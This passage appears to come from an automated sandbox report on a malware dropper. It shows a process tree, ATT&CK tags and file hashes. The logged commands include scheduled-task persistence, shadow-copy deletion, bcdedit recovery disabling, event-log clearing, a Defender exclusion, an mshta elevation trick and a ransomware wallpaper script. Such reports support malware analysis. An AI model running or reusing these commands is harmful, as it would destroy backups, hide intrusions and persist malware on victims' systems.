- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3864
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\7Installer.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\7Installer.exe"2⤵
- System Location Discovery: System Language Discovery
PID:7492 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:10700
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\build.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\build.exe"2⤵PID:4816
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Discord.exe"2⤵PID:3736
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"' & exit3⤵PID:7392
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Discord" /tr '"C:\Users\Admin\AppData\Roaming\Discord.exe"'4⤵
- Scheduled Task/Job: Scheduled Task
PID:9212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpBB73.tmp.bat""3⤵PID:5484
-
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- Delays execution with timeout.exe
PID:3456
-
-
C:\Users\Admin\AppData\Roaming\Discord.exe"C:\Users\Admin\AppData\Roaming\Discord.exe"4⤵PID:4712
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\lkyhjksefa.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\lkyhjksefa.exe"2⤵PID:10572
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\srtware.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\srtware.exe"2⤵PID:9572
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\gem1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\gem1.exe"2⤵PID:9292
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\gem1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\gem1.exe"3⤵PID:8148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9292 -s 683⤵
- Program crash
PID:6232
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\av_downloader1.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\av_downloader1.1.exe"2⤵PID:6032
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7EFF.tmp\7F00.tmp\7F01.bat C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\av_downloader1.1.exe"3⤵PID:4724
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\AV_DOW~1.EXE","goto :target","","runas",1)(window.close)4⤵
- Access Token Manipulation: Create Process with Token
PID:8064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\k360.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\k360.exe"2⤵PID:3308
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\process-injection.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\process-injection.exe"2⤵PID:7672
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\PrivacyPolicy.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\PrivacyPolicy.exe"2⤵PID:7768
-
C:\Users\Admin\AppData\Local\Temp\is-H0MVD.tmp\PrivacyPolicy.tmp"C:\Users\Admin\AppData\Local\Temp\is-H0MVD.tmp\PrivacyPolicy.tmp" /SL5="$2068E,699759,54272,C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\PrivacyPolicy.exe"3⤵PID:5424
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Client-built.exe"2⤵PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\formule.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\formule.exe"2⤵PID:7688
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:12336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"3⤵PID:12352
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\c2.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\c2.exe"2⤵PID:13360
-
C:\Windows\system32\notepad.exenotepad.exe3⤵PID:13676
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\4363463463464363463463463.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2060 -
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\svchost.exe"2⤵
- Executes dropped EXE
PID:3516
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\main.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\main.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2396 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "RtlUpdate" /tr '"C:\Users\Admin\AppData\Roaming\RtlUpdate.exe"' & exit3⤵
- System Location Discovery: System Language Discovery
PID:2964 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "RtlUpdate" /tr '"C:\Users\Admin\AppData\Roaming\RtlUpdate.exe"'4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3F2.tmp.bat""3⤵
- System Location Discovery: System Language Discovery
PID:3260 -
C:\Windows\SysWOW64\timeout.exetimeout 34⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3412
-
-
C:\Users\Admin\AppData\Roaming\RtlUpdate.exe"C:\Users\Admin\AppData\Roaming\RtlUpdate.exe"4⤵PID:2444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\hbfgjhhesfd.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\hbfgjhhesfd.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2104 -
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Framework" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\hbfgjhhesfd.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3768
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\5.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\5.exe"2⤵PID:9576
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\5.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\5.exe"3⤵PID:6460
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\Client.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\Client.exe"2⤵PID:8060
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\Discord.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\Discord.exe"2⤵PID:3964
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\AvosLocker.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\AvosLocker.exe"2⤵PID:320
-
C:\Windows\system32\cmd.execmd /c wmic shadowcopy delete /nointeractive3⤵PID:2564
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete /nointeractive4⤵PID:15176
-
-
-
C:\Windows\system32\cmd.execmd /c vssadmin.exe Delete Shadows /All /Quiet3⤵PID:2272
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
PID:15088
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} recoveryenabled No3⤵PID:10656
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No4⤵
- Modifies boot configuration data using bcdedit
PID:15308
-
-
-
C:\Windows\system32\cmd.execmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵PID:10648
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:15224
-
-
-
C:\Windows\system32\cmd.execmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"3⤵PID:6576
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"4⤵
- Command and Scripting Interpreter: PowerShell
PID:1040
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$a = [System.IO.File]::ReadAllText(\"Z:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"3⤵
- Command and Scripting Interpreter: PowerShell
PID:15080 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\781784047.png /f4⤵PID:1800
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False4⤵PID:9740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\build.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\build.exe"2⤵PID:3300
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\XClient.exe"2⤵PID:15332
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
PID:12760
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\com%20surrogate.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\com%20surrogate.exe"2⤵PID:4676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\evetbeta.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\evetbeta.exe"2⤵PID:9496
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\perviy.exe"C:\Users\Admin\AppData\Local\Temp\Files\Files\Files\Files\Files\Files\Files\Files\Files\perviy.exe"2⤵PID:8440
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OnedriveO" /sc MINUTE /mo 9 /tr "'C:\Componentperf\Onedrive.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Onedrive" /sc ONLOGON /tr "'C:\Componentperf\Onedrive.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4388
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OnedriveO" /sc MINUTE /mo 7 /tr "'C:\Componentperf\Onedrive.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:3892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4200
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 13 /tr "'C:\Recovery\3a99bb82-4e15-11ef-8354-cae67966b5f6\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "nobodyn" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\nobody.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4864
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "nobody" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\nobody.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4900
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "nobodyn" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\fr\nobody.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:4152
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepadn" /sc MINUTE /mo 11 /tr "'C:\Componentperf\notepad.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepad" /sc ONLOGON /tr "'C:\Componentperf\notepad.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3436
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "notepadn" /sc MINUTE /mo 14 /tr "'C:\Componentperf\notepad.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Windows\es-ES\conhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4568
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3668
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Windows\es-ES\conhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4236
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "componentdllc" /sc MINUTE /mo 11 /tr "'C:\Componentperf\componentdll.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "componentdll" /sc ONLOGON /tr "'C:\Componentperf\componentdll.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
PID:6872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "componentdllc" /sc MINUTE /mo 14 /tr "'C:\Componentperf\componentdll.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5964
-
C:\Windows\system32\taskeng.exetaskeng.exe {CDCE2762-E739-49E6-B3EF-497A56E916FD} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:13832
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1Direct Volume Access
1Impair Defenses
1Disable or Modify System Firewall
1Indicator Removal
2File Deletion
2Modify Registry
4Obfuscated Files or Information
1Command Obfuscation
1Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.9MB
MD57fd78c3dfb4d897f2e572a89721f272a
SHA10bf21b96846c8ba92aaffc8eef868f4ed2d36eb0
SHA2560b336aaf70796274f51f9ee315077e63433c16a84cedc1a4fe45fc17759d2aca
SHA51295693f447a4a0e102ad90f1e574ea15ce4279f6bb937cb7ba5fe384ec96a665561f9798c5f85f925c98354fbfaafda7fd099d9a7f4008c3410e23535bc4253cc
-
Filesize
352KB
MD50ea332e21336ff3e93e5713b6cf0a74f
SHA1307253c29cb74ade88684f45b8fe10fc05bcf202
SHA2563663d60f0c8125e46f3f4efb108d21fea6065f8c636e770d7efb26e66c2529a9
SHA512e734465cb281a4cbf2383e550d94b01e8459e24324977fd3c35a4d8d16beaa2bcee866639e55cf9828f6de71588580dc796b8bf0dd92bb0df6c54e22e80059cb
-
Filesize
65KB
MD5915756ae44759560e8476467163b0f5d
SHA102c6eeb6a68c4fab801061321645c3cf118b823a
SHA2560a5fe6735794d87d1cb917aa4b92947f571eff6b5541008cc1f76a666df4fbfb
SHA5124d7b862f7e4dd4856eac8e5982eb7ed10afddb943661b84cd8f06293fed80e26a65595a89b6abdd1d99bd6154791169006a6d0a4f572de756a691cfb9889049c
-
Filesize
43KB
MD5f5c8c66ab4d92f6a73694e592413760d
SHA159e2b8642df56bc3c10fa597eaa63ae3e67de6c1
SHA256f568c1c92cff4118f9a6d556d0e5329bc8265bea439c696b7b1a158d090248f9
SHA512bab02761c56ba5750fdd99b09db502b0de84a97edf90c4b9dcb981249ad3f19368b82dd61cba7d8565298a3cc3baead0f800014f0aad5b3d7dd82eb5f0459119
-
Filesize
867B
MD5c5dfb849ca051355ee2dba1ac33eb028
SHA1d69b561148f01c77c54578c10926df5b856976ad
SHA256cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b
SHA51288289cdd2c2dd1f5f4c13ab2cf9bc601fc634b5945309bedf9fc5b96bf21697b4cd6da2f383497825e02272816befbac4f44955282ffbbd4dd0ddc52281082da
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5cfdf22f46fb8f4ee7affd0b2e98ff917
SHA1566460ff948b2a5fb7b9a85070aa670418628efc
SHA2568d852ed89b55e152ddc699d4e9c8dd08125e33d6131237bad0ad56a92f1fc095
SHA512fc4d57077ad97ffd9c6ed18143991b10a9d7a458666efccd0f51fa2fa8e80af22ecb084afabf9ac402b2f5f055c692fc46c76499dc29cc32902b4afb57d59eff
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58c8340874254bba215b76345eb0428c2
SHA1b585d3b2691352fce3e75a6f853c076d6f879e03
SHA256bfffda0ce607806222d2a8e86973b2e30eaa3ca71405a5aa500e999db0937598
SHA5126d51568fbbeda525f7a5b366b0d2613392f46ef77df08124529f57997e63fcc2fd1590e79bfc988e33ff5ca8fc1487073031474e48d9fe1b0be7efdde459ad0c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5327aae1d945522b100609e9188dd90ab
SHA13aa5f3ebb2ec5b493d79d3b92de33949ddb9ab3c
SHA256bdbc6106bcfa9a201d67b833dfc5f06780db06d9305c112783afe79827198ce2
SHA512f9fd6e5757d3da1c850fc0f5617fa5343fcf3878d9e233ac2d294a8675e49606af7f7b9d642d8722a70e429e9f9cf1c53b03c458da7a8a998ff09f973fe4621d
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5b062f91aefa17eef9c4660556c9bb3aa
SHA11abf55950ee639a5c36adbc09c17970f6d400a8f
SHA256cf3b68f57a94a259cad0db315144241ac084655ec5803eaf80c60f901b7dacb3
SHA512fdb143da4a70179775cdfe715070da1e3996911d88e6c401c4c679625820f93a89661cb4f6a3adb7d08719062ccc82ad8c0b587415c09825c86908e37916e301
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5e7c6559b5d01379a3a5a6111d2a1f5a8
SHA10a70fa1068504099ed80375918ef49624e6387aa
SHA2560a703062dfc631c8e2ee4f0be4310781ec7ecba0ad657da05c5365d045b036b8
SHA51230014550341040bdd4f6d81ae7b40aa00053963b3e8e7866f71e8215cd6c32a8fe0b8338b894faa9e9e9f7a9bdd58ce6a3f8f14ec3c76a62246416973008f177
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58a150c78ec86783f94e93e3cd84b099d
SHA122c7e0e57f41bc605ddd454d811bc31c4005b722
SHA256142771d5b791cc51428bb60a057c5c1ed0d550bf630c9ddf48d083f68b376b50
SHA5124698610612fd5b33a86330aa49104a8e25f1f34629c5e9598686c2bbec8cec589b3f5aa0fadcca1012fa72c9702da2eda1caad75d5f8b941ed9a0518c01f8884
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58a1644760be51253f429e25288d427b5
SHA11f1acc5c37058d98957ea372289238ca1db11834
SHA256d7a1b6cb890f7ef0ab3fe306afbc7e79cd52b5ef7ef7be63c26dc09c18d51167
SHA512bc0921491e21f0964e14186dec6bed6648ad5ff3dc32ee3f1fe706eafd5e7f48bfec448039543dc5d4859623dfa1c7b271a89fe27c7e97a197a32f3d2001f17a
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD58f8035162661fc8a706c3ac6619038d2
SHA1d21a3b7a5d8d5f03a08e25ecf304c16d1fd21bdf
SHA256b105641d856d8c2ffbd04b5290bf7986ebf665bdb19f3a1f1f021a51c664d009
SHA512da6b1a8754e7fd93f556d3c48f08bb7fa59d082a3aea73ef80300972671980b95358769f4ff8538bd0a45625c9f3da5cabe14dfb2871b58d7f312d1685fd321c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57b4bc83fcd18aabbf8df8a18cd102dd0
SHA16bf6b249e888a8694671d9747e2af98c15dabeac
SHA256f8b5a9c7d9607ef9d5a22f38952a18c3416a2200163933f0a6bd3c7b91e566ee
SHA5126023a5cbf32b84d1155d448bd059ba49d1ac61779a4701bf8e35ade410a4f47af8bc87aeea0464db886c79255c54da7cb941479cd211270acc9b05caaa368d5c
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD536a6a6926889d8562a596eaf14e37457
SHA178921f90be361af00718f7c7d512a04788a27635
SHA256ccd06971ac5621178f8419e4fd04d00c5e8b00e7f659b394d87aaba4bbc4f8a9
SHA512b291c55bf2c0acf863bd900e0033ec5682c736c130fdfaf35f471fe6a56e0f3a1630f819eee585a1971be03190c28adacd0b88564f3911c58c7479d5f5938129
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5d5f64d5ec71e0c573cbeed3b5f9d7836
SHA1345e6335a628d0ec5be72c4f092c03636ef33131
SHA256d22093c334171f2d22e3f6ea42634ff5a4e2a328317e61998b22e6b65d5a4b3a
SHA51209770498b2dc77653691eef37fddaa0ecf76b9ea5d04c4e04527896380e7663d993e83dbc674dbc571452a9b70e5982ac93361798ecf1108afcb060908477f91
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD54d64ab5ab1c69eae9e515eedf89bcaa5
SHA1c048c8476fac3451ce555c040dfed4b98ec439a5
SHA2567477fc87612bf6ec7aed0a8217f53e2256fd0ec71c3f4a1c7818215232ba7a2e
SHA5122ed2f4efb21ec006804082c666e59643893d98efcfc94882cfc8e2db45a7be5355f0a4c882d8f281adbb1bb1291e86c713c06ef394a263ffc62347947d9a7e05
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F59A01A8B782D93EA6991BC172CEFFB1
Filesize242B
MD565bda27ee4dbb35d88e15cc749606519
SHA1ff30abf9563634ad0c0ad0612d05ac8412a5d250
SHA256f5838a57168b8fd1fa4b6a8173556a6c4adea2b1ddab4188b5fb84fc0fbdb629
SHA5127c1483f573b53649f893f5efedc12d8e2d1eea9ffbff497a4b9b20b2b19b6c0abd3255256bf0c7013e013cdde93db5248823a33443230bcecb6832eddf07cf2f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\76561199804377619[1].htm
Filesize34KB
MD5e0a4d657ecef221ce17f013851e4235e
SHA1d0733e1ef400f1fd1b91ec2eccecb09a1a800203
SHA2568a0af667a75a8023ed20c6d46616febb3a9dba48332a32614b009d3b3ef252c3
SHA51277ff46690e05ee3c322d9f8381bb495fb30e98a43297c665188d45865427005fc4828d534ac8cfd599d6b2f2c43e4b39f9144e922c5a333aa08d41462bdca17f
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40WV1DY9\76561199804377619[1].htm
Filesize25KB
